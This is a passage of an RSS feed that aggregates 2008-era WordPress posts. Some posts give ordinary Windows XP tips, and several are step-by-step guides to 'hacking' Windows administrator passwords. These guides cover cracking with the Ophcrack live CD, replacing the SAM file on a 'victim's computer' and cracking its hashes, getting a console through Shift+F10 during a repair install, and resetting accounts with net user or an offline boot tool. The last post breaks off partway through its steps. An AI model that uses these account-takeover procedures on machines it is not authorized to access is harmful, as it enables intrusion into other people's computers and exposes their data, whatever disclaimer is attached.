<description><![CDATA[Molti si chiedono come si faccia a trovare la password in Windows XP e Vista, così ho deciso di crea]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Molti si chiedono come si faccia a trovare la password in Windows XP e Vista, così ho deciso di creare una guida che spiegherà in pochi passi come bucarla.</p>
<p>Prima di tutto vi serve un cd vergine e un masterizzatore. Scaricate il LiveCd di Ophcrack, una versione gratis di linux (http://ophcrack.sourceforge.net/). Masterizzate il LiveCd, finito questo riavviate il computer, entrate nel bios e impostate la sequenza di boot come: 1) cd-rom, 2) hard disk&#8230;salvate e riavviate. Si avvierà Ophcrack e in poco tempo la password sarà nelle vostre mani!</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Null Warez Full Script ]]></title>
<link>http://nullwarezscript.wordpress.com/2009/01/13/null-warez-full-script/</link>
<pubDate>Tue, 13 Jan 2009 12:33:36 +0000</pubDate>
<dc:creator>nullwarezscript</dc:creator>
<guid>http://nullwarezscript.wordpress.com/2009/01/13/null-warez-full-script/</guid>
<description><![CDATA[script çekme null script warez script full script nulled script okey scripti haber scripti oyun scri]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>script çekme null script warez script</p>
<p>full script nulled script okey scripti haber scripti oyun scripti</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HACKING]]></title>
<link>http://howtohacking.wordpress.com/2009/01/06/hacking/</link>
<pubDate>Tue, 06 Jan 2009 15:12:41 +0000</pubDate>
<dc:creator>eranga1213</dc:creator>
<guid>http://howtohacking.wordpress.com/2009/01/06/hacking/</guid>
<description><![CDATA[]]></description>
<content:encoded><![CDATA[<div class='snap_preview'></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[]]></title>
<link>http://itshack.wordpress.com/2008/10/22/24/</link>
<pubDate>Wed, 22 Oct 2008 16:44:46 +0000</pubDate>
<dc:creator>itshack</dc:creator>
<guid>http://itshack.wordpress.com/2008/10/22/24/</guid>
<description><![CDATA[13.Quickly Fix Connectivity Problems. Are you having trouble connecting to other computers on your l]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>13.Quickly Fix Connectivity Problems.</p>
<p>Are you having trouble connecting to other computers on your local area network? If your network uses a hardware firewall that assigns IP addresses to each machine and you&#8217;re certain you&#8217;ve configured all other components correctly, check to see whether the Internet Connection Firewall is enabled. That component can effectively block communication between PCs on the network.</p>
<p>13.Hack IE Title Bar.</p>
<p>This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string &#8220;Window Title&#8221; to whatever you wish.</p>
<p>14.Unload DLLs.</p>
<p>To prevent Windows from caching DLLs after the program using them has closed, follow this procedure: Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ then left-click on Explorer. Right-click (as above) and create the DWORD</p>
<p>AlwaysUnloadDLL with a value of 1. This requires a reboot to take effect. This will allow memory to be used more efficiently.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Five Lives of Win XP]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/23/five-lives-of-win-xp/</link>
<pubDate>Tue, 23 Sep 2008 13:28:51 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/23/five-lives-of-win-xp/</guid>
<description><![CDATA[Everytime you boot, you get the dreaded Blue Screen of Death. Or, though your PC does boot, you neve]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Everytime you<br />
boot, you get the<br />
dreaded Blue<br />
Screen of Death.<br />
Or, though your PC does boot, you<br />
never get to see the desktop or use<br />
your applications and files. Everyone<br />
gives you the same verdict—<br />
re-install everything.Try these five<br />
steps before doing that to save both<br />
time and your data.<br />
For some of these to work, you<br />
should take preventive measures<br />
earlier.Each of these can be implemented<br />
without using any software<br />
or tool other than that on your<br />
Win XP CD-ROM.<br />
<strong></p>
<p>System Restore</strong></p>
<p>Where to find it: Start&#62;Programs&#62;<br />
Accessories&#62;System Tools<br />
This is the fastest recovery<br />
route, since Win XP already does<br />
most of the groundwork for you.<br />
All you have to do is to make sure<br />
that System Restore is turned on.<br />
To do this, open Control<br />
Panel&#62;System.Click on the System<br />
Restore tab and check off the &#8216;Turn<br />
off System Restore&#8217; box.If you have<br />
more than one hard drive, you will<br />
get a box with each drive and its<br />
setting listed. Click on each one,<br />
then click on Settings and set up<br />
the amount of space it should use.<br />
Now, each time your system<br />
reaches specific checkpoints—<br />
such as software installation, uninstallation<br />
and hardware<br />
change—Win XP will automatically<br />
save important system files<br />
and settings.You can also create a<br />
specific restore point by launching<br />
System Restore and choosing &#8216;Create<br />
a restore point&#8217;.<br />
Now, if the system becomes unusable,<br />
launch System Restore.<br />
Choose &#8216;Restore my computer to an<br />
earlier time&#8217; and click on Next. Select<br />
the date when you last used<br />
your PC without problems and XP<br />
will automatically restore the files<br />
and settings from that date. Note<br />
that you can only select dates<br />
shown in bold. You would need to<br />
reboot your PC after this is done to<br />
finish recovering your PC.</p>
<p><strong>Backup and Restore</strong></p>
<p>Where to find it: Start&#62; Programs&#62;<br />
Accessories&#62;System Tools<br />
This is a manual method.After<br />
launching it, click on Backup and<br />
check on the specific drives or folders<br />
to back up. To back up the system-<br />
state (same as System<br />
Restore), check on the &#8216;System<br />
State&#8217; option under &#8216;My Computer&#8217;<br />
in the left-side tree.At the bottom<br />
of the box, select a path and provide<br />
a file name for your backup<br />
(.bkf ) file. Click on &#8216;Start Backup&#8217;<br />
to begin.<br />
To restore, simply return to this<br />
utility in Safe Mode.Select the &#8216;Restore<br />
and Manage Media&#8217; tab. Select<br />
your backup file from the pane<br />
on the right and click on &#8216;Start Restore&#8217;.<br />
It&#8217;s a good idea to reboot<br />
your PC when this finishes.</p>
<p><strong>ASR (Automated System Recovery)</strong></p>
<p>Where to find it: Backup Utility,<br />
Win XP installer<br />
To use ASR, you need to create<br />
an ASR floppy disk.To use this ASR<br />
floppy, you need to boot the Win<br />
XP installer in the Recovery mode.</p>
<p><strong>Hardware profiles</strong></p>
<p>Where to find it: Control<br />
Panel&#62;System&#62;Hardware<br />
Hardware profiles help you<br />
start your PC using a different<br />
hardware configuration. For example,<br />
if you have a notebook that<br />
connects to your office network<br />
and a home LAN,then you can use<br />
the hardware profile system to<br />
store different profiles for each of<br />
these environments.This can also<br />
be used to recover your PC to a<br />
previous profile.What happens is<br />
that for more than one hardware<br />
profile created on your PC, when<br />
XP boots up,you will be prompted<br />
to select a profile to use.<br />
To create a profile, access the<br />
utility and create a copy of the default<br />
profile (&#8216;Profile 1&#8242;). If you&#8217;re<br />
using a notebook, select each profile,<br />
click on Properties and check<br />
on the &#8216;This is a portable computer&#8217;<br />
box.If you are using a docking port<br />
with this notebook, check on the<br />
&#8216;The computer is docked&#8217;.To make<br />
Win XP display this profile when<br />
booting, check the &#8216;Always include<br />
this profile as an option when Windows<br />
starts&#8217; option on.Click on OK<br />
throughout.<br />
To set up the hardware for each<br />
profile, you need to reboot the PC<br />
after the above step, in one of the<br />
other hardware profiles.Now,go to<br />
Device Manager (Control Panel&#62;<br />
Administrative Tools&#62;<br />
Computer Management).<br />
Select the hardware,<br />
right click on it<br />
and select Properties<br />
from the menu. If you<br />
want to use this hardware<br />
in this profile, select<br />
&#8216;Use this Device<br />
(enable)&#8217; in the &#8216;Device<br />
Usage&#8217; drop down at<br />
the bottom. If you<br />
don&#8217;t want to use it in<br />
the current profile, select<br />
&#8216;Do not use this<br />
device in the current<br />
hardware profile (disable)&#8217;.<br />
Selecting the<br />
last option will disable<br />
the device in all profiles,<br />
making it unusable.<br />
Click on OK when done.<br />
Now when booting,XP will display<br />
the created profiles for 30 seconds<br />
(by default). If you don&#8217;t<br />
make a selection, it will boot the<br />
one already selected on screen.</p>
<p><strong><br />
Windows File Protection</strong></p>
<p>Where to find it: Start&#62;<br />
Run&#62;SFC<br />
Win XP includes a background<br />
process called &#8216;Windows File Protection&#8217;<br />
to restore corrupt system<br />
files automatically. This software<br />
has a front end named SFC (System<br />
File Checker). To manually<br />
launch SFC, in the Start&#62;Run box,<br />
enter:<br />
<strong>SFC/SCANNOW</strong><br />
Click on OK. A small progress<br />
bar will be displayed depicting<br />
scanning and restoring your system<br />
files.You should have your Win<br />
XP CD-ROM handy. To enable<br />
proper working of this tool, start<br />
your PC in Safe Mode (without networking).</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Win XP PowerToys]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/23/win-xp-powertoys/</link>
<pubDate>Tue, 23 Sep 2008 13:26:58 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/23/win-xp-powertoys/</guid>
<description><![CDATA[Win XP PowerToys PowerToys add value and fun to the built-in features of Win XP. You can download th]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Win XP PowerToys</p>
<p>PowerToys add value and<br />
fun to the built-in features<br />
of Win XP. You can download<br />
them separately from</p>
<p>http://microsoft.com/windowsxp/</p>
<p>downloa<br />
ds/powertoys/xppowertoys.mspx.<br />
Or you can find them on this<br />
month&#8217;s PCQXtreme CD.Copy and<br />
unzip all the power toys zip files to<br />
your desktop. Then double click<br />
and install each of them.Now let&#8217;s<br />
see what each of them does.</p>
<p>Virtual Windows Manager</p>
<p>This is a very useful tool that<br />
lets you manage four desktops<br />
from your Windows<br />
taskbar. You can open<br />
different applications<br />
on different desktops<br />
and manage them<br />
seamlessly. For example,<br />
on one desktop you<br />
can run a Word application<br />
and on the other<br />
an Excel file. You just<br />
have to select the desktop<br />
you want to work<br />
on. To enable the Virtual<br />
Windows Manager,<br />
simply right click<br />
on the taskbar and select<br />
Toolbar&#62; Desktop<br />
Manager.</p>
<p>Task switcher</p>
<p>To switch between<br />
applications, you generally<br />
use Alt+Tab buttons.<br />
However, after installing this<br />
PowerToy, you can see the running<br />
applications as thumbnails, while<br />
switching between them using the<br />
Alt+Tab buttons.</p>
<p>HTML slide show wizard</p>
<p>This wizard helps you create a<br />
slide show of your digital photos in<br />
HTML. To use it, click on<br />
Start&#62;Programs&#62;Windows PowerToys&#62;&#8217;<br />
Slide Show Wizard&#8217;. This<br />
brings up a wizard on your screen.<br />
Click on Next. On the screen<br />
shown, select the digital pictures<br />
that you want on the HTML page.<br />
Click on &#8216;Add Images&#8217; button to<br />
add files individually. Alternatively,<br />
you can click on &#8216;Add folder&#8217;<br />
button to add a folder, which contains<br />
many pictures.Click again on<br />
Next to continue. On the screen<br />
that shows,give a name to the slide<br />
show and also give the path where<br />
you want to save the auto-generated HTML Web page.Now click on<br />
Next and then on Finish. Now you<br />
can use this HTML file on your<br />
website,and run a slide show.However,<br />
you need to upload the folder,<br />
the wizard creates, to your website.</p>
<p>CD slide show generator</p>
<p>This PowerToy is much like the<br />
HTML slide show wizard, except<br />
that it creates slide shows directly<br />
on the CD-R. To use this, you need<br />
a CD-writer. It enables you to view<br />
the slide show of the images burnt<br />
on a CD-ROM. To create a picture<br />
slide show on CD-ROM, add only<br />
images to the CD-ROM using Explorer<br />
and then write these files to<br />
the disc. A new task is now presented<br />
for generating the autorun<br />
file, so that the show is automatically<br />
launched when you insert the<br />
CD-ROM.</p>
<p>Webcam timershot</p>
<p>This allows you to take pictures<br />
from a Webcam connected to your<br />
computer at specified time intervals.<br />
A picture is taken and then<br />
saved to a location with a name<br />
that you specify.You can even save<br />
the pictures to a network share, an<br />
FTP share or an HTTP WebDAV<br />
share.To use it,click on Start&#62;Programs&#62;<br />
Windows<br />
PowerToys&#62;&#8217;Timer shot&#8217;.This will<br />
open a Timershot configuration<br />
window. Here, under the devices<br />
section, select Webcam. Then in<br />
the same window, set the time intervals<br />
for taking pictures.Also set<br />
the location where you want to save<br />
the pictures. Then, click on &#8216;Apply<br />
Settings&#8217; to save the settings.</p>
<p>Command here</p>
<p>This is another useful Power-<br />
Toy that adds an &#8216;Open Command<br />
Window Here&#8217; context menu option<br />
to file system folders.Now you<br />
can quickly open a command window<br />
by just right clicking on the<br />
folder. Else you will have to type<br />
&#8216;cmd.exe&#8217; from Start&#62;Run to<br />
launch a command window and<br />
then ‘cd’ to that folder.</p>
<p>Image resizer</p>
<p>It resizes digital images without<br />
using an editing software.You<br />
can resize one or many image files<br />
in one go.For this,right click on the<br />
picture files and from its context<br />
menu select &#8216;Resize Pictures&#8217;. On<br />
the window you get, select what<br />
you want to resize.</p>
<p>Tweak UI</p>
<p>You can explore system setting<br />
of your Win XP machine with this<br />
toy.You can configure Explorer settings,<br />
taskbar settings, My Computer<br />
settings, and many others,<br />
without going to the control panel.<br />
To use this toy, click on Tweak<br />
UI from Start&#62;Programs&#62;Windows<br />
Power Toys.Here,you will get<br />
an interface consisting of object on<br />
the left and its setting on the right<br />
window panel. For example, if you<br />
want to set (click speed,hover sensitivity,<br />
etc) your mouse to your<br />
liking, select mouse object from<br />
the Tweak UI interface and set its<br />
speed and sensitivity according to<br />
your ease.</p>
<p>Taskbar magnifier</p>
<p>This one allows you to magnify<br />
a part of the screen on the taskbar.<br />
You will see the magnified part of<br />
the area, which is pointed by the<br />
mouse.<br />
To activate it, right click on the<br />
taskbar and then click on the toolbar.<br />
Finally click on ‘Taskbar Magnifier’.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Delete an “UnDeletable” File]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/23/delete-an-%e2%80%9cundeletable%e2%80%9d-file/</link>
<pubDate>Tue, 23 Sep 2008 13:03:52 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/23/delete-an-%e2%80%9cundeletable%e2%80%9d-file/</guid>
<description><![CDATA[Hello Friends, this Tutorial is for all those who want to delete some files but they cannot delete t]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Hello Friends, this Tutorial is for all those who want to delete some files but they cannot delete them due to some reasons.  Well this is a Full Proof way of deleting any Damn File. After Deleting the File in this way there won’t be any trace of that File on your <a id="AdBriteInlineAd_computer" name="AdBriteInlineAd_computer" target="_top"></a><a id="KonaLink0" class="kLink" href="#" target="_top"><span style="font-weight:400;font-size:13px;position:static;color:#f8941d;"><span class="kLink" style="font-weight:400;font-size:13px;position:static;font-family:Arial,Helvetica,sans-serif;color:#f8941d;">computer</span></span></a>.</p>
<p><strong>Beware : Make sure that the file you are Deleting is not a System File.</strong></p>
<ol>
<li>Open a Command Prompt window and leave it open.</li>
<li>Close all open programs.</li>
<li><a id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" target="_top">Click</a> <a id="AdBriteInlineAd_start" name="AdBriteInlineAd_start" target="_top">Start</a>, Run and enter TASKMGR.EXE</li>
<li>Go to the Processes tab and End Process on Explorer.exe.</li>
<li>Leave <a id="KonaLink1" class="kLink" href="#" target="_top"><span style="font-weight:400;font-size:13px;position:static;color:#f8941d;"><span class="kLink" style="font-weight:400;font-size:13px;position:static;font-family:Arial,Helvetica,sans-serif;color:#f8941d;">Task </span><span class="kLink" style="font-weight:400;font-size:13px;position:static;font-family:Arial,Helvetica,sans-serif;color:#f8941d;">Manager</span></span></a> open.</li>
<li>Go back to the Command Prompt window and change to the directory the AVI (or other undeletablefile) is <a id="AdBriteInlineAd_located" name="AdBriteInlineAd_located" target="_top">located</a> in.</li>
<li>At the command prompt type DEL &#60;filename&#62; where &#60;filename&#62; is the file you wish to delete.</li>
<li>Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.</li>
<li>Close Task Manager.</li>
</ol>
<p>Or</p>
<p>you can try this</p>
<ol>
<li>Open Notepad.exe</li>
<li>Click File&#62;Save As..&#62;</li>
<li>Locate the folder where your undeletable file is</li>
<li>Choose ‘All files’ from the file type box</li>
<li>Click once on the file u wanna delete so its <a id="AdBriteInlineAd_name" name="AdBriteInlineAd_name" target="_top">name</a> appears in the ‘filename’ box</li>
<li>Put a ” at the start and end of the filename<br />
(the filename should have the extension of the undeletable file so it will overwrite it)</li>
<li>Click save,</li>
<li>It should ask u to overwrite the existing file, choose yes and u can delete it as normal</li>
</ol>
<p>Here’s a manual way of doing it. I’ll take this off once you put into your first post zain.</p>
<ol>
<li>Start Run Type: command</li>
<li>To move into a directory type: cd c:\*** (The stars stand for your folder)</li>
<li>If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1</li>
<li>Once your in the folder the non-deletable file it in type in dir &#8211; a <a id="AdBriteInlineAd_list" name="AdBriteInlineAd_list" target="_top">list</a> will come up with everything inside.</li>
<li>Now to delete the file type in del ***.bmp, txt, jpg, avi, etc… And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.</li>
</ol>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking Windows Administrator Password]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hacking-windows-administrator-password-2/</link>
<pubDate>Wed, 17 Sep 2008 18:51:33 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hacking-windows-administrator-password-2/</guid>
<description><![CDATA[This article introduce very simple way to hack Administrator Password on Win XP System.This tutorial]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>This article introduce very simple way to hack Administrator Password on Win XP System.This tutorial tells you how to break administrator password and gain access to admin account.Also if you need to crack/reveal the password you find the steps here to accomplish that also.</p>
<p>First of all let us have a close look at the Security flaws/Loopholes in Win XP</p>
<p>Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain security information about users(mainly Password).You can explore the SAM file here in this folder</p>
<p>$windows\system32\config</p>
<p>SAM is the file which contains the passwords in the form of a HASH.A HASH is a mathematically irreversible form of encryption,so that theres no way of decrypting the password back .Also there&#8217;s a file called SECURITY that contains a list of all users in the system &#38; their related information</p>
<p>We will Not be able To copy them Under XP since it doesn&#8217;t support any attempt to copy this file.</p>
<p>The Idea Behind Cracking the password</p>
<p>The Idea is simple I will explain it manually and it can also be programmed.Here&#8217;s the idea..</p>
<p>The SAM contain&#8217;s a Security Information(password/s), so I have created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Launch it Will enter directly to the system without asking about any password.So, this SAM file contain&#8217;s an open password(no password).If you have two operating system then you can get this type of SAM file from another operating system for your further use in breaking the password of the system.</p>
<p>So, the idea here is to replace the SAM file of victim&#8217;s computer(which contain&#8217;s password) with the SAM file which contains no password.When this is done the password of the victim&#8217;s account is erased and it let&#8217;s anyone to login to the computer as if there is no password set by admin.</p>
<p>But this SAM file cannot be manipulated(copy/rename/replace/delete) when the operating system is running.So here are some of the ideas to replace this SAM file.</p>
<p>1.If there are two OS installed on the computer we can boot from other OS and replace the SAM file located at</p>
<p>$:\windows\system32\config</p>
<p>2.If there is only a single OS then use the tool NTFS4DOS (http://www.free-av.com/antivirclassic/avira_ntfs4dos.html) to access the location of the SAM and SECURITY files from the boot command prompt.</p>
<p>NTFS4DOS creates a bootable floppy disk.You can use this floppy to access the NTFS drives by booting the system and mounting it to DOS.</p>
<p>Here are the steps to be followed to break the password.</p>
<p>1- Get the SAM file from another OS.</p>
<p>2- Go to the target Machine , and try to Access it by Booting from the floppy created by NTFS4DOS or by other OS(incase you have two OS installed)</p>
<p>3- After Getting Access to the Boot Command prompt c:&#62; Go to the config folder</p>
<p>$windir$\system32\config</p>
<p>And Copy the SAM File and SYSTEM File(we will need it later) To other any folder, Then replace the original SAM file(In $windows$\system32\config) with the SAM file i have provided</p>
<p>5- Reboot and Make windows enter Normally</p>
<p>6- Yeah, Now you can directly enter the system without any password. ie:The PW is broken!.</p>
<p>Now you have broken the system administrator password and you can directly enter system.Now one phase of the password hack is over.If you need to know/crack the admin password then you can use the two files SAM &#38; SECURITY that you have copied in the above STEP-3(This step is optional).It is done as follows.</p>
<p>Download any of the following Password crackers</p>
<p>1.LC4 (Lophtcrack).New version is LC5</p>
<p>OR</p>
<p>2.SAMINSIDE</p>
<p>LC5 is better according to me</p>
<p>Once you have either of the two password cracking tools,you can load the SAM &#38; SECURITY files and start the cracking process.This process may take a long time since it is Bruteforce method depending on the size of the password.</p>
<p>NOTE: THE ABOVE METHOD IS ALSO APPLICABLE FOR WINDOWS VISTA</p>
<p>WARNING: THE ABOVE INFORMATION IF FOR EDUCATIONAL PURPOSES ONLY</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack Administrator by bootable device]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-administrator-by-bootable-device/</link>
<pubDate>Wed, 17 Sep 2008 18:51:10 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-administrator-by-bootable-device/</guid>
<description><![CDATA[Here we present the rock solid windows hacks for educational purpose only! This is a utility to (re)]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Here we present the rock solid windows hacks<br />
for educational purpose only! </p>
<p>This<br />
is a utility to (re)set the password of any user that has a valid<br />
(local) account on your Windows NT/2000/XP/2003/Vista system, by<br />
modifying the encrypted password in the registry&#8217;s SAM file.<br />You do not need to know the old password to set a new one.<br />It<br />
works offline, that is, you have to shutdown your computer and boot off<br />
a floppy disk or CD. The boot-disk includes stuff to access NTFS<br />
partitions and scripts to glue the whole thing together.<br />Works with syskey (no need to turn it off, but you can if you have lost the key)<br />Will detect and offer to unlock locked or disabled user accounts!<br />Caution:<br />
If used on users that have EFS encrypted files, and the system is XP or<br />
later service packs on W2K, all encrypted files for that user will be<br />
UNREADABLE! and cannot be recovered unless you remember the old<br />
password again!<br />Download links:<br /><a class="external" href="http://home.eunet.no/%7Epnordahl/ntpasswd/cd070409.zip" rel="nofollow" target="_blank">cd070409.zip</a> (~3MB) &#8211; Bootable CD image with newer drivers<br /><a class="external" href="http://home.eunet.no/%7Epnordahl/ntpasswd/bd050303.zip" rel="nofollow" target="_blank">bd050303.zip</a> (~1.1MB) &#8211; Bootdisk image, date 050303.<br /><a class="external" href="http://home.eunet.no/%7Epnordahl/ntpasswd/sc050303.zip" rel="nofollow" target="_blank">sc050303.zip</a>(~1.4MB) &#8211; SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)<br />To<br />
write these images to a floppy disk you&#8217;ll need RawWrite2 which is<br />
included in the Bootdisk image download. To create the CD you just need<br />
to use your favorite CD burning program and burn the .ISO file to CD.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Log In WithOut Win Xp Admin Password]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/log-in-without-win-xp-admin-password-2/</link>
<pubDate>Wed, 17 Sep 2008 18:46:47 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/log-in-without-win-xp-admin-password-2/</guid>
<description><![CDATA[You can bypass the admin password by following trick for that you only need bootable Windows XP CD a]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>You can bypass the admin password by following trick for that you only need bootable Windows XP CD and little know access hole in Windows XP<br />
Let’s get started</p>
<p>1. Place your Windows XP CD and start your comp (before that set your bios set to boot from CD)</p>
<p>2. Screen messages for booting is typically “Press any key to boot from cd”</p>
<p>3. The first screen will indicate that Setup is inspecting your system and loading files.</p>
<p>4. When you get to the Welcome setup screen press Enter to setup Windows now</p>
<p>5. The licensing Agreement comes next – Press  to accept it.</p>
<p>6. The next screen is the SETUP screen which gives you the option to do a Repair. It should read something like “if on of the following Windows XP installations is damaged, Setup can try to repair it”<br />
Use the up and down arrow keys to select your XP installation (in case you have more than one Windows on your comp – if you have one, it should already be selected) and PRESS R TO BEGIN REPAIR process.</p>
<p>7. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.</p>
<p>8. Shortly after the Copying Files stage, you will be required to reboot.(this will happen automatically – you will see a progress bar stating “Your computer will reboot in 15 seconds”</p>
<p>9. During the reboot, do not make the mistake of “pressing any key” to booth from CD again! Setup will resume automatically with the standard billboard screens and you will notice INSTALLING WINDOWS is highlighted.</p>
<p>10. Keep YOUR EYE ON THE LOWER LEFT HAND SIDE OF THE SCREEN AND WHEN YOU SEE THE INSTALLING DEVICES progress bar, PRESS (SHIFT + F10). This is security hole! A command console will now open up giving you the potential for wide access to your system.</p>
<p>11. At the prompt type NUSRMGR.CPL and press ENTER. Bingo! You have just gained graphical access to your User Accounts in the Control Panel.</p>
<p>12. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type userpasswords2 at the prompt and choose to log on without being asked for password. After you’ve made tour changes close the windows, exit the command box and continue on with Repair.</p>
<p>13. Once Repair is done you will be able to log on with your new password (or with out if you chose not to be asked for password) and so lives go one.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack Administrator password after logon]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-administrator-password-after-logon/</link>
<pubDate>Wed, 17 Sep 2008 18:17:02 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-administrator-password-after-logon/</guid>
<description><![CDATA[You can change Administrator password from guest account without using any programs. It&#8217;s easy]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>You can change Administrator password from guest account without using any programs. It&#8217;s easy:<br />
1. Start-&#62; Run, type lusrmgr.msc and hit Enter.<br />
2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-&#62; Set Password and now you can change the password without knowing the old one.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack the password from command prompt]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-the-password-from-command-prompt/</link>
<pubDate>Wed, 17 Sep 2008 18:13:52 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-the-password-from-command-prompt/</guid>
<description><![CDATA[1.Open command prompt (Go to :Start &gt; Run and type : cmd). 2.Type following command : There are t]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>1.Open command prompt (Go to :Start &#62; Run and type : cmd).<br />
2.Type following command :</p>
<p>There are two commands you can use any one of them</p>
<p>1.net user &#8220;username&#8221; &#8220;password&#8221;</p>
<p>OR</p>
<p>2.control userpasswords2 &#8220;username&#8221; &#8220;password&#8221;</p>
<p>where &#8220;username&#8221; is username of account you want to hack and &#8220;password&#8221; is password that you want that is of your choice.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Changing Windows Administrator Password Without Knowing It]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/changing-windows-administrator-password-without-knowing-it/</link>
<pubDate>Wed, 17 Sep 2008 18:13:49 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/changing-windows-administrator-password-without-knowing-it/</guid>
<description><![CDATA[Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it.If yo]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it.If you somehow manage to login as an Administrator then you can change the password without knowing it.</p>
<p>Heres the Step-By-Step instructions</p>
<p>1. Right-click on the &#8220;My Computer&#8221; icon on the desktop OR in the Start Menu.</p>
<p>2. Select the option &#8220;Manage&#8221;.</p>
<p>3. On the left pane expand the &#8220;Computer Management (Local) tree (if it is not already expanded)</p>
<p>4. Double click &#8220;Local Users and Groups&#8221; option From &#8220;System Tools&#8221; tree.</p>
<p>5. Click the &#8220;Users&#8221; option.</p>
<p>6. Now you will see the list of users on the right side pane,such as Administrator,Guest etc.</p>
<p>7. Right click the &#8220;Administrator&#8221; and select the option &#8220;Set Password&#8221; option.</p>
<p>8. Now you will see a warning message,Click on proceed.</p>
<p>9. Now the system asks you for &#8220;New Password&#8221; and &#8220;Confirm Password&#8221; .</p>
<p>10. After entering the password click on &#8220;OK&#8221;.The password is changed.That&#8217;s It!</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack Account password from administrator]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/hack-account-password-from-administrator/</link>
<pubDate>Wed, 17 Sep 2008 18:13:14 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/hack-account-password-from-administrator/</guid>
<description><![CDATA[Note : If there is no administrator password then this trick works. 1.Reboot Computer. 2.Press F8 an]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Note : If there is no administrator password then this trick works.</p>
<p>1.Reboot Computer.<br />
2.Press F8 and go in the Safe mode.<br />
3.Open control panel and then open User accounts.<br />
4.Change the password.</p>
<p>U hav finished.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Hack Administrator Password of Window XP without PC Open!!]]></title>
<link>http://jaiminworld.wordpress.com/2008/09/17/how-to-hack-administrator-password-of-window-xp-without-pc-open/</link>
<pubDate>Wed, 17 Sep 2008 18:12:22 +0000</pubDate>
<dc:creator>jaiminworld</dc:creator>
<guid>http://jaiminworld.wordpress.com/2008/09/17/how-to-hack-administrator-password-of-window-xp-without-pc-open/</guid>
<description><![CDATA[Lets do it fast…. 1. Go to Start –&gt; Run –&gt; Type in CMD 2. Enter command: cd\ windows\system32 ]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Lets do it fast….</p>
<p>1. Go to Start –&#62; Run –&#62; Type in CMD<br />
2. Enter command: cd\ windows\system32<br />
3. mkdir newpass<br />
